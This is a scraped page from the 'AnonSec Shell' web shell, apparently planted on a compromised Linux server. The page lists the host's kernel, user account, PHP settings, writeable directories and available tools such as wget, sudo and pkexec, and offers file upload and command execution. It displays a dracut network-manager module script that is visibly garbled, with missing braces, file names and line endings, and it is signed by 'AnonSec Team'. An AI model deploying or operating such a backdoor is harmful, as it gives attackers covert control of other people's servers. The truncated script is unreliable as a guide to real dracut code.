AnonSec Shell
Server IP :  /  Your IP :
Web Server : Apache
System : Linux 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64
User : internationaljou ( 1019)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/dracut/modules.d/35network-manager/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]


Command :

[ HOME ]     

Current File : /lib/dracut/modules.d/35network-manager/

# called by dracut
check() {
    local _program

    require_binaries sed grep || return 1

    # do not add this module by default
    return 255

# called by dracut
depends() {
    return 0

# called by dracut
installkernel() {
    return 0

# called by dracut
install() {
    local _nm_version

    _nm_version=$(NetworkManager --version)

    # We don't need `ip` but having it is *really* useful for people debugging
    # in an emergency shell.
    inst_multiple ip sed grep

    inst NetworkManager
    inst /usr/libexec/nm-initrd-generator
    inst_multiple -o teamd dhclient
    inst_hook cmdline 99 "$moddir/"
    inst_hook initqueue/settled 99 "$moddir/"
    inst_rules 85-nm-unmanaged.rules
    inst_libdir_file "NetworkManager/$_nm_version/"
    inst_simple "$moddir/" "/lib/"

    if [[ -x "$initdir/usr/sbin/dhclient" ]]; then
        inst /usr/libexec/nm-dhcp-helper
    elif ! [[ -e "$initdir/etc/machine-id" ]]; then
        # The internal DHCP client silently fails if we
        # have no machine-id
        systemd-machine-id-setup --root="$initdir"

    # We don't install the ifcfg files from the host automatically.
    # But the user might choose to include them, so we pull in the machinery to read them.
    inst_libdir_file "NetworkManager/$_nm_version/"

    _arch=${DRACUT_ARCH:-$(uname -m)}

    inst_libdir_file {"tls/$_arch/",tls/,"$_arch/",}"*" \

Anon7 - 2022
AnonSec Team